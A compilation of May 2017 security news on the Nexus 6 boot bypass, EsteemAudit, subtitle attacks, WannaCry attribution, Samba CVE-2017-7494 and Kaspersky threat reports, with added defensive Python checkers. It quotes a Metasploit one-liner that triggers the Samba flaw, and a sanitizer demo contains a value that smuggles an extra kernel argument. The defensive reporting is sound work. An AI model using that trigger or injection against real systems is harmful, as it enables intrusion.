After previously discovering they could tamper with the bootmode, the researchers focused on finding ways to compromise a device further by inserting arbitrary arguments into the command line. Eventually, they discovered that they could defeat Secure Boot by being able to control a single argument.

The exploit relies on initramfs, a cpio (gzipped) archive that gets loaded into rootfs (a RAM filesystem) during the Linux kernel initialization. The bootloader prepares the kernel command line and initramfs parameters for the Linux kernel in the Device Tree Blob, and then transfers execution to the Linux kernel.

The kernel_init function executes the first userspace process, /init, and the kernel command line argument rdinit can override this default. Exploiting that alone wasn’t effective, mainly because the Nexus 6 initramfs doesn’t contain a large enough set of binaries, the researcher notes.

“Interestingly, we’ve realized that in arm, it is also possible to control, through a kernel command line argument initrd, the physical address where the initramfs is loaded from by the kernel,” Hay says.

By overriding the default values provided by the bootloader in the Device Tree Blob, the researchers caused the Kernel to crash. Next, they focused on loading their own initramfs archive to the device’s memory, through fastboot.

“Note that the Linux Kernel does not re-verify the authenticity of initramfs, it relies on the bootloader to do that, so if we manage to put a tampered initramfs at the controlled phys_initrd_start physical address, the kernel will indeed populate it into rootfs,” the researcher explains.

Fastboot offers a download mechanism via USB and, because the operation is available even on locked bootloaders, an attacker can abuse it to load a tampered initramfs on the device. The exploit is then successful if the bootloader and Kernel don’t overwrite the data before initramfs is populated into rootfs.

The security researchers created a Proof-of-Concept initramfs and made it publicly available on GitHub. Upon gaining full control of rootfs, an attacker can create a malicious /vendor folder, where firmware images of various SoCs available on the board would normally be saved.

“Kernel drivers usually consume these images upon initialization, and update their SoC counterparts if needed. Hence, the attacker could flash unsigned firmware images. We haven’t checked if there are such, but from our experience with other devices, there are. As for signed ones, downgrade attacks might be possible as well,” Hay says.

Google addressed the issue in the May 2017 set of monthly patches by setting the bootloader to sanitize the fsg-id, carrier and console config arguments.
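The fix described above is an input-validation rule: values the bootloader copies from a fastboot-controllable parameter into the kernel command line must not be able to break out of their own key=value token, because the kernel splits its command line on whitespace. The following is an added illustration of that rule, not code from the Nexus 6 bootloader or from the HCL researchers; a real bootloader implements it in C, and the allowlist of permitted characters, the base command line and the sample values are constructed for this example.

```python
import re

# Characters a single bootloader-supplied value may contain. This allowlist is
# constructed for the example; the essential property is that whitespace (the
# kernel's argument separator), '=' (the key/value separator) and double
# quotes (which the kernel honours when tokenizing) are all excluded, so a
# value can never be parsed as a second parameter.
_VALUE_CHARS = re.compile(r"[A-Za-z0-9._,:/-]*")

# The three bootloader-prepared arguments the article says fastboot could set
# on a locked Nexus 6 and which the May 2017 patch started sanitizing.
FASTBOOT_CONTROLLED = ("fsg-id", "carrier", "console")


def is_safe_value(value):
    """True if the value cannot escape its own key=value token."""
    return _VALUE_CHARS.fullmatch(value) is not None


def build_cmdline_unsanitized(base, params):
    """Before the fix: values are concatenated verbatim."""
    return " ".join([base] + ["%s=%s" % (k, v) for k, v in params.items()])


def build_cmdline_sanitized(base, params):
    """After the fix: a tainted value for a fastboot-controlled key is refused
    outright (the boot fails) instead of being quietly 'cleaned', so a
    tampered parameter can never reach the kernel in any form."""
    for key, value in params.items():
        if key in FASTBOOT_CONTROLLED and not is_safe_value(value):
            raise ValueError("tainted bootloader argument %s=%r" % (key, value))
    return build_cmdline_unsanitized(base, params)


def parse_cmdline(cmdline):
    """Approximates how the kernel tokenizes its command line: split on
    whitespace, with the first '=' separating key from value."""
    parsed = {}
    for token in cmdline.split():
        key, _, value = token.partition("=")
        parsed[key] = value
    return parsed


def demo():
    """Shows the two behaviours side by side on a constructed input: a
    harmless marker token smuggled into the console value via a space."""
    base = "androidboot.hardware=example"
    tainted = {"console": "ttyHSL0,115200 injected=1", "carrier": "generic"}
    before = parse_cmdline(build_cmdline_unsanitized(base, tainted))
    try:
        build_cmdline_sanitized(base, tainted)
        rejected = False
    except ValueError:
        rejected = True
    # Returns (marker reached the kernel before the fix, boot refused after it)
    return "injected" in before, rejected


if __name__ == "__main__":
    print(demo())
```

Rejecting rather than stripping is deliberate: a bootloader that "repairs" a tampered value still boots with attacker-influenced input, whereas refusing leaves the device in a state the user will notice.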


NSA EsteemAudit exploit could trigger a new WannaCry-like attack
26.5.2017 securityaffairs BigBrothers

Security experts from enSilo firm released a free patch for Windows systems vulnerable to the NSA-linked ESTEEMAUDIT Exploit.
The WannaCry emergency may not be over: the NSA dump leaked by the Shadow Brokers team included many other dangerous exploits.

Last month the Shadow Brokers group released another batch of data containing exploit code still unpatched by Microsoft, such as “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan.”

The availability of such exploits and hacking tools represents a serious problem; an attacker with technical knowledge can use them to compromise millions of Windows systems across the world.

“Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk.” continues Microsoft.

Let’s start with the EsteemAudit exploit. It is a hacking tool that targets the RDP service (port 3389) on machines running the no longer supported Microsoft Windows Server 2003 / Windows XP.

It has been estimated that over 24,000 systems remain vulnerable to the EsteemAudit exploit.

“Even one infected machine opens your enterprise to greater exploitation,” explained security researchers Omri Misgav and Tal Liberman of enSilo, the cyber security firm that developed an unofficial patch for the EsteemAudit exploit.

“In the trove of stolen exploits published by the Shadow Group appears ESTEEMAUDIT, an RDP exploit which can allow malware to move laterally within the organization, similar to what we had seen with WannaCry.” reads a blog post from Ensilo.

“enSilo is giving away its patch against ESTEEMAUDIT for free with the intention of helping organizations around the world to better improve their security posture in one easy, but critical step.

It is important to note that patching this exploit will not make these XP systems fully secure. There are still many unpatched vulnerabilities in Windows XP, and we urge organizations to update their systems accordingly.

Until that happens, we believe that in-the-wild critical exploits like ESTEEMAUDIT and ETERNALBLUE must be patched.”

Experts warn that the EsteemAudit exploit could be used in network-wormable threats: threat actors in the wild could develop malware able to propagate through a target’s network without user interaction.

“Years later, there continue to be hundreds of millions of machines relying on XP and Server 2003 operating systems in use around the world. Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today and the cybersecurity industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of global market share.” continues the blog post from Ensilo.

There is already malware in the wild that infects systems using the RDP protocol as its attack vector (CrySiS, Dharma, and SamSam); the EsteemAudit exploit could potentially make these threats far more aggressive and dangerous.

Users and enterprises running the vulnerable systems are advised to upgrade to supported versions to protect themselves from EsteemAudit attacks.
Where upgrading is impossible, the systems must be secured in other ways, for example by disabling the RDP service or placing it behind a firewall.

You can also deploy the unofficial patch developed by Ensilo to secure your systems.


Subtitles hack threatens Millions of PCs, Smart TVs, Tablets and Smartphones
26.5.2017 securityaffairs Virus

Security experts from security firm Check Point warn of a subtitle hack that threatens millions of devices.
According to the experts at Check Point, hackers could exploit a new attack vector that uses malicious subtitles to compromise devices via their media players.

Millions of users worldwide can be targeted due to security vulnerabilities in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time, and strem.io.

“Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles.” states the analysis shared by Check Point. “By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and strem.io. We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.”

Patches for these vulnerabilities are available for download; users should apply them immediately.

According to the security firm’s report, titled “Hacked in Translation,” approximately 200 million video players and streamers are currently exposed to the subtitle attack.

Attackers can craft malicious subtitle files that, once loaded by a user’s media player, allow them to take complete control over any type of device (i.e., laptops, smart TVs, tablets, and smartphones).

Unlike other attack vectors well known to security firms, this hacking technique is very subtle because subtitles are perceived as harmless text files and are not subject to inspection by security solutions.

In the subtitle hack, the subtitle file is manipulated by attackers for several malicious purposes.

“This method requires little or no deliberate action on the part of the user, making it all the more dangerous,” states Check Point.

Check Point analyzed vulnerabilities in media players that allow a remote attacker to execute code and gain full control of the targeted system.

The researchers were able to exploit a flaw in the popular VLC player to trigger a memory corruption issue and gain control of a PC. Similar successful tests allowed the researchers to demonstrate the subtitle hack on other players.

In the proof of concept attack presented by Check Point, victims are either persuaded to visit a malicious website that uses one of the streaming video players, or tricked into opening a malicious subtitle file that they intentionally downloaded for use with a video.

“By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more,” wrote Check Point.

Check Point plans to disclose the technical details of the tests only once software updates have been provided to users.

Below is the list of updates currently available:

PopcornTime – A fixed version has been created, but it is not yet available for download on the official website.
The fixed version can be manually downloaded via the following link: https://ci.popcorntime.sh/job/Popcorn-Time-Desktop/249
Kodi – Officially fixed and available for download on their website. Link: https://kodi.tv/download
VLC – Officially fixed and available for download on their website.
Link: http://get.videolan.org/vlc/2.2.5.1/win32/vlc-2.2.5.1-win32.exe
Stremio – Officially fixed and available for download on their website.
Link: https://www.strem.io/


Jury Out on North Korea Link to Ransomware Attack

25.5.2017 securityweek Ransomware

Was North Korea behind the ransomware epidemic that hit global computer networks earlier this month?

That's the subject of heated debate in cybersecurity circles after analysts found similarities in the "WannaCry" worm to other malware attributed to North Korea, including the 2014 hack of Sony Pictures and a cyberheist of millions of dollars from the Bangladesh central bank.

The security firm Symantec this week said the shared code makes it "highly likely" that the attacks were connected to the hacker group given the code name Lazarus, which many believe is North Korean.

Israel-based cybersecurity firm Intezer last week reached a similar conclusion, finding that WannaCry had "strong links to other malware families, believed to be developed by North Korean hackers, or known to be used in attacks against South Korean organizations."

Russian-based security firm Kaspersky Lab and others also pointed to a likely North Korean link.

While the evidence is not conclusive -- hackers can often hide or "spoof" their real identities -- North Korea is emerging as one of the likely suspects despite a strong denial by the Pyongyang envoy to the United Nations, some analysts say.

Symantec researchers said that despite the likely North Korea link, the WannaCry attacks "do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign."

- Desperate for cash -

"I could easily see North Korea doing this as a way to get money," said Paul Benda, a Pentagon and Department of Homeland Security official who is now chief technology officer at Global Security and Innovative Strategies, a Washington consultancy.

"With the sanctions they are under they need cold hard cash."

Other analysts have noted that sanctions squeezing Pyongyang may be prompting desperate actions to raise cash through various channels, including cybercrime.

"While years of sanctions have isolated the Hermit Kingdom from much of the global financial system, North Korea may be seeking to fund the state's coffers through a widespread cybercrime campaign," said FireEye analyst Luke McNamara in a recent post on the Lawfare blog.

Paradoxically, he said, the effort to persuade and other nations to pressure North Korea may be encouraging further cyberattacks: "Pyongyang would be left with few options to compensate for lost income that it could ramp up as quickly as cybercrime."

The attacks discovered last week caused havoc in global computer networks, affecting as many as 300,000 machines in 150 countries and disrupting governments and several industries. The hackers developed the virus to exploit a flaw exposed in leaked documents from the National Security Agency.

- Inconsistencies -

But despite the growing concerns over North Korea, some analysts say it's too soon to point the finger and cite inconsistencies with the Pyongyang connection.

The WannaCry attack appeared unsophisticated: researchers were able to halt the spread with a $10 purchase of a web domain that activated a "kill switch."

And various estimates showed the "ransom" raised amounted to a paltry $116,000 from 302 entities more than a week after computers were locked down.

James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, said WannaCry was "barely functional" and spread widely only because of the large number of networks and computers which failed to upgrade security and were vulnerable to the self-replicating "worm."

The hackers known as Lazarus are a sophisticated cybermercenary group, Scott told AFP. "They use elaborate traps, obfuscation techniques and wipers to eliminate digital footprints. This (WannaCry) has none of that."

More likely, Scott said, is that the attacks were carried out by hackers from China's People's Liberation Army "moonlighting" in their spare time.

Scott, who disputes the widely held belief that the Lazarus group is North Korean, said it is possible that Pyongyang has outsourced some of its cybercrime to these freelance Chinese hackers.

Analysts at Boston-based security firm Cybereason also question the role of North Korea.

"Nothing in North Korea's past cyber campaigns or in their conventional military and foreign policy fit this mold," the researchers said in a blog.

John Arquilla, chair of defense analysis at the Naval Postgraduate School, said that despite the common patterns in the recent attacks, cyber forensics still have a long way to go to positively identify the source of an attack.

"We are not at the level of CSI," he said, referring to the popular television criminal forensics show. "We have to be very careful about the potential for deception. I would not rush to take military or economically coercive actions on the basis of what might or might not be the truth" on the source of the attacks, Arquilla said.


Samba Patches Code Execution Flaw Introduced in 2010

25.5.2017 securityweek Vulnerability

The developers of the Samba interoperability software suite announced on Wednesday the availability of security updates that patch a serious remote code execution vulnerability. Researchers have warned that there are many vulnerable systems accessible directly from the Internet.

The flaw, tracked as CVE-2017-7494, affects all versions of Samba since 3.5.0, released in March 2010. The security hole has been addressed in versions 4.6.4, 4.5.10 and 4.4.14, and a workaround has been made available for unsupported versions.

According to Samba maintainers, the vulnerability allows a malicious client to upload a shared library to a writable share, and cause the server to load and execute that file.

The vulnerability exposes various types of systems to attacks, including Linux and network-attached storage (NAS) devices. Rapid7 has warned that many users may not even realize that their systems are running Samba.

Samba provides file and print sharing capabilities between Windows and Unix computers, and it implements many protocols, including SMB, which malicious actors leveraged in the recent WannaCry ransomware attacks. This has led some experts to believe that CVE-2017-7494 could also be exploited for similar worm attacks.

“Unlike SMB, Samba exists on a wide variety of systems from different makers - servers, laptops, home routers, network storage systems, media servers, and many IoT devices. And unlike Windows, those devices may not automatically install an update - even if the manufacturer provides one,” researcher David Longenecker said in a blog post.

Exploiting the vulnerability is easy and proof-of-concept (PoC) code has already been made public, which could lead to in-the-wild attacks. HD Moore, VP of research and development at Atredis, has created a Metasploit module for CVE-2017-7494 and showed how the flaw can be exploited on Ubuntu and a Synology NAS product.

HD Moore (@hdmoore), 8:23 PM - 24 May 2017: Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")

A scan conducted by Rapid7 with its Project Sonar showed more than 104,000 Internet-exposed endpoints running a vulnerable version of Samba, and nearly 90 percent of these systems had been running outdated versions of the software.

Individuals and organizations that still use older versions of Samba can prevent attacks by adding the parameter “nt pipe support = no” to the global section of their smb.conf file. Red Hat also pointed out that the SELinux security module blocks potential exploits.


CVE-2017-7494 Samba vulnerability, patch your installation now!
25.5.2017 securityaffairs Vulnerability

A seven-year-old remote code execution vulnerability, tracked as CVE-2017-7494, affects all versions of the Samba software since 3.5.0. The flaw has been patched by the project’s development team. An attacker can exploit the CVE-2017-7494 RCE to upload a shared library to a writable share and then cause the server to load and execute it.

The CVE-2017-7494 flaw can be easily exploited; a single line of code is enough, provided the vulnerable computers meet specific conditions:

(a) port 445 (file and printer sharing) is reachable from the Internet,
(b) shared files are configured with write privileges, and
(c) the server paths for those files are known or guessable.

HD Moore (@hdmoore), 8:23 PM - 24 May 2017: Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")

When those conditions are satisfied, remote attackers can upload any code of their choosing and cause the server to execute it, possibly with unfettered root privileges, depending on the vulnerable platform.

“All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.” reads the security advisory issued by Samba.
The announcement published by Samba informed users that a patch addressing this remote code execution vulnerability tracked as CVE-2017-7494 was available at the following URL:

http://www.samba.org/samba/security/

Sysadmins have to patch their installations as soon as possible; if that is not possible for any reason, a workaround can be implemented by adding the line

nt pipe support = no
to their Samba configuration file and restarting the network’s SMB daemon.

The change will limit clients from accessing some network computers.

“Additionally, Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.”
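The two Samba articles above give an administrator three things to check: the running version against the security releases (4.6.4, 4.5.10, 4.4.14), whether the “nt pipe support = no” workaround is present in the [global] section of smb.conf, and whether any share is writable, since the advisory says exploitation needs a writable share. The following added example (not Samba project code) turns those checks into a small script. It assumes a version string of the usual “Version 4.x.y” form, a simplified smb.conf reader that ignores include/copy directives, and a constructed smb.conf embedded as sample input.

```python
import re

FIRST_AFFECTED = (3, 5, 0)
# Security releases named in the advisory, keyed by maintained branch.
FIXED_BY_BRANCH = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
_NO_VALUES = ("no", "false", "0")
_YES_VALUES = ("yes", "true", "1")


def parse_version(text):
    """Extract major.minor.patch from strings such as 'Version 4.4.12'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unrecognised Samba version: %r" % text)
    return tuple(int(x) for x in m.groups())


def version_is_patched(text):
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return True  # predates the vulnerable code introduced in 3.5.0
    fixed = FIXED_BY_BRANCH.get(v[:2])
    if fixed is not None:
        return v >= fixed
    # Branches newer than 4.6 appeared after the fix; every older, unmaintained
    # branch received only source patches, so treat its releases as unpatched.
    return v[:2] > (4, 6)


def parse_smb_conf(text):
    """Minimal smb.conf reader: [section] headers and 'key = value' lines.
    Comment lines start with '#' or ';'. Parameter names are matched
    case-insensitively with whitespace collapsed, so 'NT Pipe  Support'
    and 'nt pipe support' compare equal."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def workaround_applied(conf):
    """The advisory workaround only counts when set in [global]."""
    return conf.get("global", {}).get("nt pipe support", "yes").lower() in _NO_VALUES


def writable_shares(conf):
    """Shares a client may write to. Samba's default is 'read only = yes';
    'writable', 'writeable' and 'write ok' are inverse synonyms (precedence
    between conflicting settings is simplified here)."""
    result = []
    for name, opts in conf.items():
        if name == "global":
            continue
        writable = opts.get("read only", "yes").lower() in _NO_VALUES or any(
            opts.get(s, "no").lower() in _YES_VALUES
            for s in ("writable", "writeable", "write ok"))
        if writable:
            result.append(name)
    return result


def assess(version_text, smb_conf_text):
    conf = parse_smb_conf(smb_conf_text)
    patched = version_is_patched(version_text)
    mitigated = workaround_applied(conf)
    shares = writable_shares(conf)
    return {
        "patched": patched,
        "workaround": mitigated,
        "writable_shares": shares,
        # Exposure as the advisory frames it: unpatched, no workaround,
        # and at least one share an attacker could write a library into.
        "exposed": not patched and not mitigated and bool(shares),
    }


# Constructed sample smb.conf for the example (not from any real host).
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = NAS

[public]
   path = /srv/public
   writable = yes

[docs]
   path = /srv/docs
   read only = yes
"""

if __name__ == "__main__":
    print(assess("Version 4.4.12", SAMPLE_CONF))
```

On a real host the version string comes from `smbd -V` and the configuration from the system's smb.conf; the script reports the writable shares so an administrator can also weigh tightening share permissions while waiting for the upgrade.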

The Samba bug appears to be network-wormable: it could be exploited by malicious code to self-replicate from vulnerable machine to vulnerable machine without requiring user interaction.
Hurry up: an exploit for the Samba bug is expected to be available for the Metasploit framework in the coming days.

HD Moore, who is vice president of research and development at Atredis Partners, posted the following images showing successful exploits against Samba on a computer running Ubuntu and on a NAS device made by Synology.

HD Moore (@hdmoore), 11:20 PM - 24 May 2017: Examples of exploiting Samba CVE-2017-7494 on Ubuntu 16.04 and a Synology NAS. Metasploit module should be PRd sometime in the next 24 hours

The first crack at a Metasploit PR for Samba CVE-2017-7494 already appeared on GitHub.

HD Moore (@hdmoore), 2:50 AM - 25 May 2017: First crack at a Metasploit PR for Samba CVE-2017-7494: https://github.com/rapid7/metasploit-framework/pull/8450 …
First crack at Samba CVE-2017-7494 by hdm · Pull Request #8450 · rapid7/metasploit-framework
This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an updat...


Wanna Cry Again? NSA’s Windows 'EsteemAudit' RDP Exploit Remains Unpatched
25.5.2017 thehackernews Ransomware

Brace yourselves for a possible 'second wave' of massive global cyber attack, as SMB (Server Message Block) was not the only network protocol whose zero-day exploits created by NSA were exposed in the Shadow Brokers dump last month.
Although Microsoft released patches for the SMB flaws for supported versions in March, and for unsupported versions immediately after the outbreak of the WannaCry ransomware, the company has not patched three other NSA hacking tools, dubbed "EnglishmanDentist," "EsteemAudit," and "ExplodingCan."
It has been almost two weeks since WannaCry ransomware began to spread, which infected nearly 300,000 computers in more than 150 countries within just 72 hours, though now it has been slowed down.
For those unaware, WannaCry exploited a Windows zero-day SMB bug that allowed remote hackers to hijack PCs running on unpatched Windows OS and then spread itself to other unpatched systems using its wormable capability.
EsteemAudit: Over 24,000 PCs Still Vulnerable
EsteemAudit is another dangerous NSA-developed Windows hacking tool leaked by the Shadow Brokers that targets RDP service (port 3389) on Microsoft Windows Server 2003 / Windows XP machines.
Since Microsoft no longer supports Windows Server 2003 and Windows XP and, unlike with EternalBlue, has not released any emergency patch for the EsteemAudit exploit so far, over 24,000 vulnerable systems remain exposed on the Internet for anyone to hack.
"Even one infected machine opens your enterprise to greater exploitation," says enSilo, a cyber security firm that came up with the AtomBombing attack last year and has now released an unofficial patch for EsteemAudit, which is described later in this article.
EsteemAudit can also be used as a wormable malware, similar to the WannaCry ransomware, which allows hackers to propagate in the enterprise networks, leaving thousands of systems vulnerable to ransomware, espionage and other malicious attacks.
Ransomware authors, such as criminals behind CrySiS, Dharma, and SamSam, who are already infecting computers via RDP protocol using brute force attacks, can leverage EsteemAudit anytime for widespread and damaging attacks like WannaCry.
How to Secure Your Computers?

Due to the havoc caused by WannaCry, SMB service gained all the attention, neglecting RDP.
"Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today, and the cyber security industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of the global market share," enSilo says.
Since Microsoft has not released any patch for this vulnerability, users and enterprises are advised to upgrade their systems to newer versions to secure themselves from EsteemAudit attacks.
"Of the three remaining exploits, “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan,” none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk," Microsoft says.
If it's hard for your enterprise to upgrade its systems immediately, it should at least secure the RDP port by either disabling it or putting it behind the firewall.
Meanwhile, enSilo has released a patch to help Windows XP and Server 2003 users secure their machines against EsteemAudit. You can apply the patch to secure your systems, but keep in mind, that it is not an official patch from Microsoft.
If you have any doubts about the patch, enSilo is a reputable cyber security company, though I expect Microsoft to release an official patch before any outcry like that of WannaCry.


IT threat evolution Q1 2017
25.5.2017 Kaspersky Analysis

The aim of most targeted attack campaigns is to steal sensitive data. However, this isn’t always the goal. Sometimes attackers erase data instead of – or as well as – trying to gain access to confidential information. We’ve seen several wiper attacks in recent years. They include Shamoon (also known as ‘Disttrack’), believed to have been used to erase data on more than 30,000 computers at Saudi Aramco in 2012, and Dark Seoul, used in the attack on Sony Pictures in 2013.

IT threat evolution Q1 2017

Shamoon re-appeared in November 2016, targeting organisations in various critical and economic sectors in Saudi Arabia. So far we have observed three waves of attacks using the Shamoon 2.0 malware – activated on 17 November 2016, 29 November 2016 and 23 January 2017.

While the attacks share many similarities with the earlier wave of attacks, they now feature new tools and techniques. The attackers start by obtaining administrator credentials for the target network. Then they build a custom wiper (Shamoon 2.0) which uses the stolen credentials for lateral movement across the organisation. Finally, the wiper activates on a predefined date, leaving the infected computers unusable. The final stage of the attack is completely automated and doesn’t rely on communication with the attacker’s C2 (Command-and-Control) center.

Shamoon 2.0 also includes a ransomware component. This has yet to be used in the wild, so it’s unknown whether the attackers would use this part of the platform for financial gain or for idealistic purposes.

While investigating the Shamoon attacks, we discovered a previously unknown wiper. This malware, which we’ve named StoneDrill, also seems to target organisations in Saudi Arabia. There are similarities in style to Shamoon, with additional features designed to help it evade detection. One of the victims of StoneDrill, observed via the Kaspersky Security Network (KSN) is located in Europe (and operates in the petro-chemicals sector), suggesting that the attackers might be expanding their wiping operations beyond the Middle East.

IT threat evolution Q1 2017

The most significant difference between the two relates to the wiping process. Shamoon uses a disk driver for direct access to the disk, whereas StoneDrill injects the wiper directly into the victim’s preferred browser.

StoneDrill also shares similarities with an APT group known as NewsBeef (also known as ‘Charming Kitten’), so-called because of its use of the Browser Exploitation Framework (BeEF). These similarities include familiar WinMain and OS signatures, update commands and C2 server names. It isn’t known whether the groups behind Shamoon and StoneDrill are the same, or are just aligned in terms of interests and the regions they target – the latter seems most likely to us.

IT threat evolution Q1 2017

In addition to the wiping module, StoneDrill also includes a backdoor that has been used to run espionage operations against a number of targets.

You can find the full report on Shamoon 2.0 and StoneDrill here. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

EyePyramid

As we’ve seen before, targeted attacks don’t have to be technically advanced in order to be successful. In January 2016, the arrest of two suspects by Italian police brought to light a series of cyber-attacks that targeted prominent politicians, bankers, freemasons and members of law enforcement agencies.

The malware used in the attacks, called ‘EyePyramid’, was unsophisticated, but nevertheless successful enough to enable the attackers to gain access to all resources on their victims’ computers. The police investigation revealed 100 active victims in the server used to host the malware, but there were indications that the attackers had targeted around 1,600 victims in the last few years. Their victims – located mostly in Italy – included law firms, consultancy services, universities and Vatican cardinals.

IT threat evolution Q1 2017

The Italian police report didn’t include technical details about how the malware was spread – other than revealing that spear-phishing was used. However, it did identify a number of C2 servers and e-mail addresses used by the attackers to exfiltrate stolen data. Using this information, we created a YARA rule, based on custom e-mail addresses, C2 servers, licences for the custom mailing library used by the attackers and specific IP addresses used in the attack. Then we ran it through our systems to see if it matched any known samples. Our initial YARA rule highlighted two samples, which enabled us to create a more specific YARA rule that identified a further 42 samples in our collection. A further search revealed more details about EyePyramid. The attacks relied on social engineering to trick victims into opening and running infected files attached to the spear-phishing e-mails. The attachments used were ZIP and 7ZIP archives which contained the malware. The attackers used multiple spaces to try to mask the extension of the file – underlining the low level of sophistication of the attacks.
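The extension-masking trick described above (a decoy extension such as .pdf, then a long run of spaces, then the real executable extension) is straightforward to catch before an attachment reaches a user. The following is an added example, not code from the Kaspersky report or from the EyePyramid investigation: it builds a constructed ZIP attachment in memory and flags archive members whose names are padded this way or that end in an executable extension. The file names and archive contents are constructed for the demonstration; the padding threshold of three spaces is an assumption.

```python
import io
import re
import zipfile

# Extensions a mail gateway should never pass through unquestioned (assumed list).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}

# Decoy extension, then at least three spaces, then the real extension,
# e.g. "report.pdf                 .exe" (threshold of 3 spaces is an assumption).
PADDED_NAME = re.compile(
    r"^(?P<stem>.*?\.(?P<decoy>[A-Za-z0-9]{1,5}))(?P<pad> {3,})(?P<real>\.[A-Za-z0-9]{1,4})$"
)


def classify_name(name: str) -> dict:
    """Return a verdict dict for a single archive member name."""
    base = name.rsplit("/", 1)[-1]          # ignore any directory prefix inside the archive
    m = PADDED_NAME.match(base)
    if m:
        real_ext = m.group("real").lower()
    elif "." in base:
        real_ext = "." + base.rsplit(".", 1)[-1].lower()
    else:
        real_ext = ""
    return {
        "name": name,
        "padded": m is not None,
        "pad_len": len(m.group("pad")) if m else 0,
        "decoy_ext": ("." + m.group("decoy")).lower() if m else None,
        "real_ext": real_ext,
        "executable": real_ext in EXECUTABLE_EXTS,
    }


def scan_zip(data: bytes) -> list:
    """Classify every member of a ZIP archive given as bytes (no extraction needed)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [classify_name(n) for n in zf.namelist()]


def suspicious(verdicts: list) -> list:
    """Names that are padded or executable: either alone is reason to quarantine."""
    return [v["name"] for v in verdicts if v["padded"] or v["executable"]]


def build_sample_zip() -> bytes:
    """Constructed sample archive for the demonstration; not a real EyePyramid attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("agenda.docx", b"harmless placeholder")
        zf.writestr("Contratto.pdf" + " " * 40 + ".exe", b"MZ placeholder, not a real binary")
        zf.writestr("notes.txt", b"plain text")
    return buf.getvalue()


if __name__ == "__main__":
    for v in scan_zip(build_sample_zip()):
        print(v)
    print("quarantine:", suspicious(scan_zip(build_sample_zip())))
```

The check deliberately keys on the member name rather than on content, because a padded name is a signal in its own right: no legitimate sender produces "Contratto.pdf" followed by forty spaces and ".exe".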

Based on the compilation time-stamps of the samples, which appear to be legitimate, most samples used in the attacks were compiled in 2014-15.

IT threat evolution Q1 2017

It’s clear that cybercriminals can achieve success even when the malware they use is neither sophisticated nor hard to detect. From the poor OPSEC (operational security) employed in the campaign (for example, using IP addresses associated with their own company and discussing victims in regular phone calls and using WhatsApp), it’s clear that the attackers were amateurs. Nevertheless, they were able to operate for many years and managed to steal gigabytes of data from their victims.

You can read our full report on EyePyramid here.

Breaking the weakest link of the strongest chain

In the middle of 2016 more than 100 Israeli servicemen were targeted by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ C2 server.

The IDF (Israeli Defense Forces) C4I and the IDF Information Security Department unit, with Kaspersky Lab researchers, obtained a list of the victims – all IDF servicemen serving around the Gaza strip.

This campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device has been compromised, a process of sophisticated intelligence gathering begins, exploiting the phone’s video and audio capabilities, SMS functions and location.

The attacks are unsophisticated, relying heavily on social engineering techniques. The attackers lure their victims into installing a malicious application, while continuously attempting to acquire confidential information using social networks: the group seems particularly active on Facebook Messenger. Most of the avatars used by the attackers (virtual participants in the social engineering stage of the attack) lure the victims using sexual themes: for example, asking the victim to send explicit photographs and, in return, sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and others.

The victim is tricked into downloading an app from a malicious URL. The app collects data from the victim’s phone, including general information (network operator, GPS location, IMEI, etc.), contacts, browsing history, SMS messages, pictures. The app is also able to record video and audio.

IT threat evolution Q1 2017

